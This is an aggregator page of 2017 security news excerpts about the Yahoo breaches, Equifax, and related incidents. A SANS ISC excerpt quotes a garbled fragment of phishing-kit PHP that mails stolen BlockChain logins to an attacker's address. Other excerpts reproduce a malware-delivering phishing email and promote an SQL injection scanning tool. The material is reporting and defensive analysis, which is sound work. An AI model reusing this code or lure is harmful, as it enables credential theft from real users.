What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2017-12-07 18:32:22 | The Cumulative Effect of Major Breaches: The Collective Risk of Yahoo & Equifax (lien direct) | Until quite recently, people believed that a dizzying one billion accounts were compromised in the 2013 Yahoo! breach… and then it was revealed that the real number is about three billion accounts. That raises the question: so what? Isn't all the damage from a four-year-old breach already done? | Equifax Yahoo | ||
 |
2017-12-02 01:15:15 | Carding Kingpin Sentenced Again. Yahoo Hacker Pleads Guilty (lien direct) | Roman Seleznev, a Russian man who is already serving a record 27-year sentence in the United States for cybercrime charges, was handed a 14-year sentence this week by a federal judge in Atlanta for his role in a credit card and identity theft conspiracy that prosecutors say netted more than $50 million. Separately, a Canadian national has pleaded guilty to charges of helping to steal more than a billion user account credentials from Yahoo. | Guideline | Yahoo | |
|
2017-11-29 18:39:21 | Canadian Pleads Guilty to Hacking Yahoo (lien direct) | A 22 year-old Canadian national accused of carrying attacks on Yahoo pleaded guilty on Tuesday to charges returned by a grand jury in the Northern District of California in February 2017. | Guideline | Yahoo | ★★★ |
 |
2017-11-29 10:40:24 | Kazakhstan-born Canadian citizen pleads guilty to 2014 Yahoo hack, he admits helping Russian Intelligence (lien direct) | >The Kazakhstan-born Canadian citizen Karim Baratov (22) has pleaded guilty to massive 2014 Yahoo hack that affected three billion accounts. The Kazakhstan-born Canadian citizen Karim Baratov (22) (Kay, a.k.a Karim Taloverov, a.k.a Karim Akehmet Tokbergenov), has pleaded guilty to massive 2014 Yahoo data breach that affected three billion accounts. Karim Baratov was arrested in Toronto at his home by the Toronto Police […] | Guideline | Yahoo | |
 |
2017-11-29 07:48:19 | The Least Significant Pawn in the Yahoo Hack Pleads Guilty (lien direct) | Karim Baratov, a 22-year-old Canadian national, pleaded guilty to charges related to the FBI's investigation into the Yahoo 2014 data breach. [...] | Guideline | Yahoo | |
 |
2017-11-29 00:56:38 | 22-Year-Old Hacker Pleads Guilty to 2014 Yahoo Hack, Admits Helping Russian Intelligence (lien direct) | Karim Baratov, a 22-year-old Kazakhstan-born Canadian citizen, has pleaded guilty to hacking charges over his involvement in massive 2014 Yahoo data breach that affected all three billion yahoo accounts.
In March, the US Justice Department announced charges against two Russian intelligence officers (Dmitry Dokuchaev and Igor Sushchin) from Russia's Federal Security Service (FSB) and two
|
Guideline | Yahoo | |
 |
2017-11-28 20:27:00 | Suspect in Yahoo Breach Case Pleads Guilty (lien direct) | Karim Baratov admits he worked on behalf of Russia's FSB. | Yahoo | ||
|
2017-11-27 06:00:57 | Yahoo Groups Plagued by Downtime, Technical Issues for Almost a Week (lien direct) | Yahoo Groups were nonfunctional all last week, according to customers complaining on the company's support forum and Twitter. [...] | Yahoo | ||
 |
2017-11-14 01:15:54 | Former Yahoo CEO\'s Testimony @ US Senate Hearing (lien direct) | The ISBuzz Post: This Post Former Yahoo CEO’s Testimony @ US Senate Hearing | Yahoo | ||
 |
2017-11-09 10:26:24 | Difficult for Corporations to Stop Breaches (lien direct) | >Yahoo’s former CEO testified at a Senate hearing stating it was tough for any corporation to stop or defend against cyberattacks that come from nation-states. View Full Story ORIGINAL SOURCE: Data Breach Today | Yahoo | ★★ | |
 |
2017-11-08 20:16:00 | Equifax, Yahoo fail to answer the most basic questions during Senate hearing (lien direct) | Senators were left frustrated as Yahoo didn't know how it was hacked, and Equifax still didn't know who. | Equifax Yahoo | ||
|
2017-11-08 12:19:00 | Yahoo\'s Ex-CEO Mayer Calls Out Russian Hackers (lien direct) | Former Yahoo Chief Executive Marissa Mayer apologizes for massive data breach that exposed billions of user accounts. | Yahoo | ||
|
2017-11-02 10:55:16 | Marissa Mayer to Testify at Data Breach Senate Hearing (lien direct) | >Ex-Yahoo! CEO Marissa Mayer will testify, alongside the current and past Equifax CEO’s, in front of Senators on Nov. 8th, on two massive data breaches. Read Full Story ORIGINAL SOURCE: Fortune | Equifax Yahoo | ||
|
2017-11-01 11:39:51 | Are you overlooking the chink in your cybersecurity armour? (lien direct) | >In a landscape full of high-profile data breaches, such as Yahoo and Tesco Bank, we're seeing more and more organisations looking to bolster their defences in order to protect their business critical assets. However, are organisations overlooking the smaller, intermediate devices in their network that could provide an access point for the craftier cybercriminal? One ... | Yahoo | ||
 |
2017-10-23 14:35:10 | SQLiv – SQL Injection Dork Scanning Tool (lien direct) |  SQLiv is a Python-based massive SQL Injection dork scanning tool which uses Google, Bing or Yahoo for targetted scanning, multiple-domain scanning or reverse domain scanning.
SQLiv Massive SQL Injection Scanner Features
Both the SQLi scanning and domain info checking are done in a multiprocess manner so the script is super fast at scanning a lot of URLs. It's a fairly new tool and there are plans for more features and to add support for other search engines like DuckDuckGo.
Read the rest of SQLiv – SQL Injection Dork Scanning Tool now! Only available at Darknet.
|
Yahoo | ||
|
2017-10-23 12:34:42 | 20 Year Software: Engineering and Updates (lien direct) | Twenty years ago, Windows 95 was the most common operating system. Yahoo and Altavista were our gateways to the internet. Steve Jobs just returned to Apple. Google didn’t exist yet. America Online had just launched their Instant Messenger. IPv6 was coming soon. That’s part of the state of software in 1997, twenty years ago. We … Continue reading "20 Year Software: Engineering and Updates" | Yahoo | ||
|
2017-10-17 04:33:28 | Microsoft Kept Secret That Its Bug-Tracking Database Was Hacked In 2013 (lien direct) | It was not just Yahoo among "Fortune 500" companies who tried to keep a major data breach incident secret.
Reportedly, Microsoft had also suffered a data breach four and a half years ago (in 2013), when a "highly sophisticated hacking group" breached its bug-reporting and patch-tracking database, but the hack was never made public until today.
According to five former employees of the
|
Yahoo | ||
 |
2017-10-12 06:23:52 | In Post Password Era, Passwords are the Problem (lien direct) | The standard password has never been less effective or more susceptible to attacks. But some of the U.S.’s leading corporations say they’re also not ready to get rid of it. Las Vegas, Nevada — Businesses knew that passwords were dead long before the theft of billions of user credentials from Yahoo! and information on more...Read the whole entry... _!fbztxtlnk!_ https://feeds.feedblitz.com/~/468643926/0/thesecurityledger -->» | Guideline | Yahoo | |
|
2017-10-09 17:15:01 | Yahoo! Data Breach Affected 3 Billion Users (lien direct) | The ISBuzz Post: This Post Yahoo! Data Breach Affected 3 Billion Users | Yahoo | ||
 |
2017-10-05 15:40:26 | (Déjà vu) Gemalto commente la faille de sécurité Yahoo (lien direct) | Suite à la dernière faille de sécurité dévoilée par Yahoo, Gemalto a dévoilé les résultats du Breach Level Index, une base de données mondiale analysant les failles de données publiquement divulguées. Le Breach Level Index révèle notamment que les 918 failles de données identifiées se sont traduites par 1,9 milliards de fichiers compromis dans le monde au cours du premier semestre 2017. En comparaison avec les 6 derniers mois de l'année 2016, le nombre de fichiers perdus, compromis ou volés a connu une (...) - Malwares | Yahoo | ||
|
2017-10-04 17:00:00 | Yahoo, Equifax Serve as Cautionary Tales in Discerning Data Breach Scope (lien direct) | Both companies this week revealed that their previously disclosed breaches impacted a lot more people than previously thought. | Equifax Yahoo | ||
|
2017-10-04 13:42:51 | Every Yahoo account hacked from 2013 breach (lien direct) | It has been revealed that every user who had a Yahoo account in 2013 was likely to have been affected by the breach. View Full Story ORIGINAL SOURCE: NPR | Yahoo | ★★★★★ | |
|
2017-10-04 13:38:10 | Piratage de Yahoo : Les 3 milliards de comptes touchés (lien direct) |  Lors du piratage de 2013, Yahoo avait laissé entendre à demi-mot au bout d'un certain temps que le nombre de comptes utilisateurs compromis était de 1 milliard. Or, la société vient tout juste d'avouer la terrible vérité : ce sont en fait bien les 3 milliards de comptes (soit la totalité) qui ont été compromis ! |
Yahoo | ||
|
2017-10-04 12:00:53 | Yahoo Breach Hit 3 Billion Records (lien direct) | The ISBuzz Post: This Post Yahoo Breach Hit 3 Billion Records | Yahoo | ||
 |
2017-10-04 11:54:40 | Tous les comptes Yahoo ont été piratés en 2013 ! (lien direct) | Trois milliards de comptes ont été compromis lors de la plus vaste cyberattaque de l'histoire. On ignore toujours en revanche si la Russie est bien mêlée à cette affaire.  |
Yahoo | ||
 |
2017-10-04 06:57:56 | 2013 Yahoo Breach Affected All 3 Billion Accounts (lien direct) | Yahoo on Tuesday released an update to its 2013 breach, notifying users that all 3 billion accounts in existence at the time were compromised. | Yahoo | ||
|
2017-10-04 05:46:37 | Yahoo hack – All 3 Billion Yahoo accounts were hacked in 2013 attack (lien direct) | The Yahoo hack occurred in 2013 is bigger than originally stated, Verizon confirmed that all 3 Billion Yahoo accounts were hacked in the attack. The Yahoo hack occurred in 2013, the biggest known data breach suffered by a tech company, is bigger than originally stated. Verizon Communications, which acquired Yahoo for $4.48 billion in June, […] | Yahoo | ||
|
2017-10-04 04:34:50 | Fear Not: You, Too, Are a Cybercrime Victim! (lien direct) | Maybe you've been feeling left out because you weren't among the lucky few hundred million or billion who had their personal information stolen in either the Equifax or Yahoo! breaches. Well buck up, camper: Both companies took steps to make you feel better today. Yahoo! announced that, our bad!: It wasn't just one billion users who had their account information filched in its record-breaking 2013 data breach. It was more like three billion (read: all) users. Meanwhile, big three credit bureau Equifax added 2.5 million more victims to its roster of 143 million Americans who had their Social Security numbers and other personal data filched in a breach earlier this year. At the same time, Equifax's erstwhile CEO informed Congress that the breach was the result of even more bone-headed security than was first disclosed. To those still feeling left out by either company after this spate of news, I have only one thing to say (although I feel a bit like a broken record in repeating this): Assume you're compromised, and take steps accordingly. | Equifax Yahoo | ||
|
2017-10-04 02:54:30 | 2013 Hack Hit All 3 Billion Yahoo Accounts: Company (lien direct) | 
|
Yahoo | ||
 |
2017-10-04 00:17:57 | The biggest hack in history is actually three times bigger than we feared (lien direct) |  |
Yahoo | ||
|
2017-10-03 23:01:39 | It\'s 3 Billion! Yes, Every Single Yahoo Account Was Hacked In 2013 Data Breach (lien direct) | The largest known hack of user data in the history just got tripled in size.
Yahoo, the internet company that's acquired by Verizon this year, now believes the total number of accounts compromised in the August 2013 data breach, which was disclosed in December last year, was not 1 billion-it's 3 Billion.
Yes, the record-breaking Yahoo data breach affected every user on its service at the
|
Yahoo | ||
 |
2017-10-03 21:46:47 | Yahoo 2013 data breach hit \'all three billion accounts\' (lien direct) | The internet giant says three billion user accounts were affected, more than originally thought. | Yahoo | ||
|
2017-10-03 18:10:00 | Yahoo: All 3 Billion Accounts Affected in 2013 Breach (lien direct) | Every single Yahoo account was affected in a 2013 data breach, bringing the total from 1 billion to 3 billion. | Yahoo | ||
|
2017-10-03 17:58:08 | Yahoo Corrects 2013 Data Breach Announcement From One Billion To "All Users" (lien direct) | In a statement posted online today, Yahoo — now rebranded as Oath and part of Verizon — corrected the estimation on a security breach announced last year from the initial assessment of one billion to "all Yahoo user accounts." [...] | Yahoo | ||
 |
2017-09-15 13:00:00 | Things I Hearted this Week (lien direct) |
A new beginning, a refresh, or has nostalgia finally caught up? We’re changing the name of this weekly update back to “Things I Hearted this Week”. Here are some of the popular and not-so-popular security and technology stories that caught our fancy for your reading pleasure.
“It’s the only and most fascinating read you need to keep up to date with your security needs.” – Someone I hired to say this from fiverr.com
Equifax
The big one on the tip of everyone’s tongue this week has been Equifax.
There’s little value in repeating every interesting article that was published on this topic during the week. From Adrian Sanabria’s Savage Security blog telling us Equifax breached, no eyebrows raised. To Brian Krebs providing his characteristic in-depth review The Equifax Breach: What you should know. All the way to articles exposing the poor manner in which the company has decided to respond, we tested Equifax's data breach checker — and it's basically useless.
There have been many large breaches, what makes Equifax largely different is that the details stolen weren’t things like usernames or passwords that could be easily changed. Rather it was users names, date of birth, and social security numbers – which are almost impossible to change.
Then there’s the case that a lot of the impacted individuals weren’t even customers of Equifax. They merely had their data held by the credit bureau. So it’s unlike, say, the Yahoo breach, where users can simply shut down their account and take their business elsewhere.
All eyes will be on the regulators to see if they can get to the bottom of the mess, and levy appropriate penalties. Maybe it’s time for the US to crystallise data protection, much like GDPR is seeking to achieve across Europe.
Chatbot to sue Equifax
It turns out that if you want to sue Equifax, you can do so without involving a lawyer. The creator, Joshua Browder, originally developed the chatbot to help people appeal against parking enforcement tickets. But now it’s looking to take on the big one and sue Equifax for its colossal breach.
Chatbot lets you sue Equifax for up to $25,000 without a lawyer | The Verge
Legal technology: the rise of the chatbots | Law Gazette
Artificial intelligence developed its own non-human language | The Atlantic
Phishers targeting LinkedIn users via hijacked accounts
As users, we’re often aware of the dangers that could arise from a poorly secured bank account, but we don’t often give as much thought to other accounts we own such as email or social media. While an individual may not find LinkedIn particularly interesting themselves beyond maintaining a professional presence, attackers look at such accounts differently and will leverage to their advantage wherever possible. Therefore it is important users take the right steps to protect all of their accounts and social media profiles as best as possible by using stro |
Equifax Yahoo | ||
|
2017-09-05 14:10:00 | Judge Rules that Yahoo Breach Victims Can Sue (lien direct) | The 1 billion users who were victims in Yahoo's massive data breaches between 2013 to 2016 received court approval to move forward with their case. | Yahoo | ||
 |
2017-09-05 13:36:56 | Yahoo! braces itself for enormous class-action suit over breaches (lien direct) | A court ruling means that Yahoo! and its parent company, Verizon, could end paying a heavy price for the huge breaches that saw more than 1bn people's details compromised |
Yahoo | ||
|
2017-08-29 13:00:00 | One Man Cyber Attacked 4,000 Companies; Don\'t Let It Happen to You (lien direct) |
A cyber-attack over the past four months was discovered which targeted more than 4,000 companies, and successfully penetrated at least 14 of them. The targets were mainly in the oil and gas, mining, transportation, and construction sectors - in locations as diverse as Germany, Kuwait, UAE, Egypt, and Croatia. The malicious party was able to acquire sensitive financial data and remote control of endpoints. Some speculated that a sophisticated criminal organization might be behind the attack. However, it turned out that the attacker was a 20-year-old man from Nigeria, and he was hardly a cyber mastermind.
In fact, it was not difficult for researchers to discover the culprit’s identity:
“Following extensive research into the campaign, researchers have revealed the identity of the criminal behind it. He is a Nigerian national, working on his own. On his social media accounts, he uses the motto: ‘get rich or die trying.’”
The attacker had sent very crudely written phishing emails with improper punctuation, which would've made me immediately suspicious of if one had ended up in my inbox. Here's what was sent in the body of his emails:
“Dear Sir/Ms,...
Please confirm the receipt of this mail as we have sent several emails to your esteemed company.
Find attach 2 pages of our purchase order request for the month of May,
kindly send us PI signed and stamped also do advice bank details for LC processing.
Thanks and Regards
Nurafi
--
Saudi Aramco
P.O. Box 5000
Dhahran 31311, Saudi Arabia”
The email attachment's file name was “Saudi Aramco Oil And Gas.rar,” and the 591.1 Kb file had NetWire, a remote access Trojan, and HawkEye, a commericial keylogger, bound to it.
NetWire is considered to be the first multi-platform RAT malware. It's primarily designed to exploit weaknesses in point-of-sale systems, but can also acquire sensitive financial data from client machines which aren't part of a POS system. It's configured to be spread as an email attachment Trojan, where it can linger for months while undetected.
HawkEye is another malware which is sold in the Dark Web to be distributed as an email attachment Trojan. Its payload is a DOCX file, which can then acquire email and web browser passwords and engage in keylogger spyware functions.
The only thing the attacker did to obscure his location was to put “Saudi Arabia” in his emails. He used two free Yahoo webmail addresses, which made it easy for the researchers to trace him. Plus, the fact that he only used two email addresses also meant that the companies he was targeting could have easily blocked those addresses to avoided receiving email from that attacker again.
Given the simplistic nature of this operation, it's really concerning that his victims were large companies, not small or medium sized businesses. It's often assumed that large companies are more likely to have CISOs and better security monitoring systems with technologies such as SIEM in their server rooms. It's surprising to hear about so many large organizations falling for such a pedestrian, script kiddie sort of attack. Here are lessons that can be learned from its success, which can help you be better prepared and avoid falling victim to similar attacks:
Train all your employees and contractors who have business email accounts. Teach them about phishing. Tell them to never open email attachments from senders who aren't known to the company, and to never share financial details except with specific people. Avoid sharing sensitive data o |
Guideline | Yahoo | |
|
2017-08-23 18:35:00 | Suspect in Yahoo Breach Pleads Not Guilty (lien direct) | Karim Baratov enters his plea in US Courts today, after waiving his extradition hearing in Canada last week. | Yahoo | ||
|
2017-08-22 12:55:00 | Yahoo Hack Suspect to be Extradited to US (lien direct) | Karim Baratov, accused of working with Russian intelligence for the 2014 Yahoo breach, has waived an extradition hearing. | Yahoo | ||
|
2017-08-18 19:56:16 | Accused Yahoo Hacker to be Handed Over to U.S. Marshals (lien direct) | A Canadian man accused of carrying out devastating cyberattacks on Yahoo waived his right to an extradition hearing on Friday and will soon be handed over to US marshals. | Yahoo | ||
 |
2017-06-25 08:42:00 | Even weak hackers can pull off a password reset MitM attack via account registration (lien direct) | At the IEEE Symposium on Security and Privacy 2017, researchers from the College of Management Academic Studies in Israel presented an interesting paper on bad password reset processes, “The Password Reset MitM Attack†(pdf). It explains how a weak attacker could take over accounts by exploiting vulnerabilities in password reset procedures.They dubbed the attack: password reset man-in-the-middle (PRMitM). The researchers said Google is “extremely vulnerable†to PRMitM, but Facebook, Yahoo, LinkedIn, Yandex and other sites and email services are also vulnerable as well as mobile apps like Whatsapp, Snapchat and Telegram.To read this article in full or to leave a comment, please click here | Yahoo | ||
 |
2017-06-13 01:26:00 | More notes on US-CERTs IOCs (lien direct) | Yet another Russian attack against the power grid, and yet more bad IOCs from the DHS US-CERT.IOCs are "indicators of compromise", things you can look for in order to order to see if you, too, have been hacked by the same perpetrators. There are several types of IOCs, ranging from the highly specific to the uselessly generic.A uselessly generic IOC would be like trying to identify bank robbers by the fact that their getaway car was "white" in color. It's worth documenting, so that if the police ever show up in a suspected cabin in the woods, they can note that there's a "white" car parked in front.But if you work bank security, that doesn't mean you should be on the lookout for "white" cars. That would be silly.This is what happens with US-CERT's IOCs. They list some potentially useful things, but they also list a lot of junk that waste's people's times, with little ability to distinguish between the useful and the useless.An example: a few months ago was the GRIZZLEYBEAR report published by US-CERT. Among other things, it listed IP addresses used by hackers. There was no description which would be useful IP addresses to watch for, and which would be useless.Some of these IP addresses were useful, pointing to servers the group has been using a long time as command-and-control servers. Other IP addresses are more dubious, such as Tor exit nodes. You aren't concerned about any specific Tor exit IP address, because it changes randomly, so has no relationship to the attackers. Instead, if you cared about those Tor IP addresses, what you should be looking for is a dynamically updated list of Tor nodes updated daily.And finally, they listed IP addresses of Yahoo, because attackers passed data through Yahoo servers. No, it wasn't because those Yahoo servers had been compromised, it's just that everyone passes things though them, like email.A Vermont power-plant blindly dumped all those IP addresses into their sensors. As a consequence, the next morning when an employee checked their Yahoo email, the sensors triggered. This resulted in national headlines about the Russians hacking the Vermont power grid.Today, the US-CERT made similar mistakes with CRASHOVERRIDE. They took a report from Dragos Security, then mutilated it. Dragos's own IOCs focused on things like hostile strings and file hashes of the hostile files. They also included filenames, but similar to the reason you'd noticed a white car -- because it happened, not because you should be on the lookout for it. In context, there's nothing wrong with noting the file name.But the US-CERT pulled the filenames out of context. One of those filenames was, humorously, "svchost.exe". It's the name of an essential Windows service. Every Windows computer is running multiple copies of "svchost.exe". It's like saying "be on the lookout for Windows".Yes, it's true that viruses use the same filenames as essential Windows files like "svchost.exe". That's, generally, something you should be aware of. But that CRASHOVERRIDE did this is wholly meaningless.What Dragos Security was actually reporting was that a "svchost.exe" with the file hash of 79ca89711cdaedb16b0ccccfdcfbd6aa7e57120a was the virus -- it's the hash that's the important IOC. Pulling the filename out of context is just silly.Luckily, the DHS also provides some of the raw information provided by Dragos. But even then, there's problems: they provide it in formatted | Yahoo | ||
|
2017-06-07 13:30:00 | Cybersecurity Stands as Big Sticking Point in Software M&A (lien direct) | The breach that was the fly in the ointment of the Yahoo-Verizon deal is one of many now surfacing as security of acquired firms starts to become a point of negotiation. | Yahoo | ||
|
2017-06-05 16:41:54 | Yahoo Pays Out Thousands of Dollars for Serious Flaws (lien direct) | Yahoo has awarded thousands of dollars to a couple of researchers who managed to find serious vulnerabilities in the company's systems. The bug bounty hunters published blog posts over the weekend describing their findings. | Yahoo | ||
 |
2017-06-02 08:23:48 | Phishing Campaigns Follow Trends, (Fri, Jun 2nd) (lien direct) | Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields: Internet actors Google, Yahoo!, Facebook, ... Software or manufacturers Apple, Microsoft, Adobe, ... Financial Services Paypal, BoA, name your preferred bank, ... Services DHL, eBay, ... But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time aphishing page trying to lure the Bitcoinoperator: BlockChain. Blockchain[1] is a key player in the management of width:600px" /> Hopefully, the webshellisn padding:5px 10px"> $from = From: b hacker@forever.org\n $from .= MIME-Version: 1.0\r\n $from .= charset=ISO-8859-1\r\n if(@$_GET[accedi]==login){ mail(carlosromero19871@gmail.com header( Location: richiesta_otp.html }else{ Note that the login procedure on BlockChain is extremely strong: 2FA authentication and one-time link is sent via email to approve all login attempts. Be sure that activate them if youre a BlockChain customer. The fact that Bitcoins, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: There is a trend in companies that make a reserve of Bitcoins to prevent possible Ransomware attacks![3] [1] https://www.blockchain.com [2]http://klimatika.com.ua/block/ [3]https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/ Xavier Mertens (@xme) ISC Handler - Freelance Security Consultant PGP Key (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. | Yahoo | ||
 |
2017-05-30 08:13:01 | Yahoo Pipes, le retour du clone qui ne lâche rien (lien direct) | Je ne sais pas si vous vous souvenez, mais Yahoo Pipes était un formidable outil qui permettait de prendre de la donnée web (flux RSS, page web...etc.) et de mouliner tout ça pour en faire un contenu sur mesure en fonction de vos besoins. Je m'en servais beaucoup pour produire des flux RSS maison et > Lire la suite Cet article merveilleux et sans aucun égal intitulé : Yahoo Pipes, le retour du clone qui ne lâche rien ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. | Yahoo | ||
|
2017-05-23 18:00:36 | Yahoo Retires ImageMagick After Bugs Leak Server Memory (lien direct) | Researcher Chris Evans reported a new bug and showed how also used a previously known flaw in ImageMagick to leak Yahoo server data and steal images and authentication secrets. | Yahoo | ||
|
2017-05-23 02:38:02 | Yahoo Ditching ImageMagick Highlights Issues in Bug Responsibility Ecosystem (lien direct) | ImageMagick, an open source command line graphics file editor, has been retired by one of its major consumers: Yahoo. The product has been beset by flaws and bugs for several years, but this appears to have been one too many for Yahoo. Following discovery of a bleed vulnerability, Yahoo fixed it by retiring the product. | Yahoo | ||
|
2017-05-23 01:11:45 | 18-Byte ImageMagick Hack Could Have Leaked Images From Yahoo Mail Server (lien direct) | After the discovery of a critical vulnerability that could have allowed hackers to view private Yahoo Mail images, Yahoo retired the image-processing library ImageMagick.
ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermarking and tweak images. The tool is supported by PHP, Python, Ruby, Perl, C++, and many other programming languages.
This
|
Yahoo |
To see everything:
Our RSS (filtrered)
